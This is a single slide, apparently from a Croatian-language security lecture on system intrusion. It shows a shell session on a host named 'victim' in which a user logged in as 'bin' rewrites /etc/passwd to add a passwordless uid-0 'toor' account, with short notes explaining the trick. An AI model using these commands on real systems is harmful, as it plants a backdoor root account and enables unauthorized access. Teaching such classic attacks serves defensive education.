Upad na sistem (8)

victim % ls -ldg /etc

drwxr-sr-x 8 bin staff 2048 Jul 24 18:02 /etc

victim % cd /etc

victim % mv passwd pw.old

victim % (echo toor::0:1:instant root shell:/:/bin/sh; cat pw.old ) > passwd

victim % ^D

• ne zaboravite - na stroj smo ušli kao “bin” koji je vlasnik /etc direktorija

• dodali smo korisnika s identifikacijom “0” koji ima status kao i root

• dalje je jednostavno - smislite sami!

Previous slide

Next slide

Back to first slide

View graphic version